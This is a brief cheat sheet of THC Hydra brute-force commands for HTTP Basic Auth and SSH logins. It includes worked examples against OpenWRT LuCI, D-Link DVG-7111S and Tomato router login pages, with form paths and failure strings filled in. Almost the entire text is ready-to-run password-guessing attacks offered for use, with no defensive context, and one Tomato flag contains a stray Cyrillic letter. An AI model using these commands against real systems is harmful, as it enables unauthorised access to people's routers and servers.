Table of Contents
Basic Auth
hydra -V -l <login> -P <path_to_dict> <host> http-head <url>
SSH
hydra -V -l <login> -P <path_to_dict> -t 1 <host> ssh
Examples
OpenWRT LuCI
hydra -V -l root -P <path_to_dict> -t 1 <ip_address> http-post-form -m "/cgi-bin/luci:username=^USER^&password=^PASS^:Authorization Required"
Dlink DVG-7111S
hydra -V -l admin -P <path_to_dict> -t 1 <ip_address> http-post-form -m "/goform/LoginPost:username=^USER^&password=^PASS^:LoginFailedForm"
Tomato
hydra -К -V -l admin -P <path_to_dict> -t 1 -f <ip_address> http-get / hydra -R -V -l admin -s 8080 -P <path_to_dict> -t 1 -f <ip_address> https-get /